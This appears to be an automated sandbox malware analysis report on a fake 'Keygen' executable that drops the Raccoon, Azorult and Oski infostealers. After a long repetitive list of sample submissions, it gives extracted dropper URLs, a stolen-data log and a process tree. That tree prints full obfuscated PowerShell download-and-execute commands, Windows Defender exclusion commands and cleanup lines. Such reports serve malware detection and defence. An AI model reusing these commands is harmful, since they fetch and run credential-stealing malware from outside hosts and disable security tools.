Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

8

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    52s
  • max time network
    155s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (105) — копия.exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 01:56:07 GMT Bot_ID: 664A9041-4AC4-46F3-B3DC-87DB4D57890E_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.51 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: GOHCSFBB - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (838 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 24 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (105) — копия.exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (105) — копия.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3300
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1A25.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (105) — ?????.exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:848
      • C:\Users\Admin\AppData\Local\Temp\1A25.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1664
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1A25.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3264
          • C:\Users\Public\tlp.exe
            "C:\Users\Public\tlp.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5084
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4200
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:4360
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 4360 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\091817725964424\\* & exit
                  8⤵
                    PID:4956
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 4360
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:548
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:4256
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4680
              • C:\Users\Public\tlp.exe
                "C:\Users\Public\tlp.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:4324
                • C:\Users\Admin\AppData\Local\Temp\qSa0iAJjZT.exe
                  "C:\Users\Admin\AppData\Local\Temp\qSa0iAJjZT.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2720
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\qSa0iAJjZT.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4304
                • C:\Users\Admin\AppData\Local\Temp\JmLnxuRkJp.exe
                  "C:\Users\Admin\AppData\Local\Temp\JmLnxuRkJp.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4204
                • C:\Users\Admin\AppData\Local\Temp\zVeaQKZPZq.exe
                  "C:\Users\Admin\AppData\Local\Temp\zVeaQKZPZq.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  PID:4188
                  • \??\c:\windows\SysWOW64\cmstp.exe
                    "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\ri50lnh4.inf
                    8⤵
                      PID:4716
                  • C:\Users\Admin\AppData\Local\Temp\2jaWbMkMaF.exe
                    "C:\Users\Admin\AppData\Local\Temp\2jaWbMkMaF.exe"
                    7⤵
                    • Executes dropped EXE
                    • Windows security modification
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3776
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "powershell" Get-MpPreference -verbose
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4104
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\tlp.exe"
                    7⤵
                      PID:4824
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        8⤵
                        • Delays execution with timeout.exe
                        PID:4416
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1A25.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2188
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3884
            • C:\Windows\SysWOW64\timeout.exe
              timeout 1
              3⤵
              • Delays execution with timeout.exe
              PID:2552
            • C:\Windows\SysWOW64\mshta.exe
              "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\1A25.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1836
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof 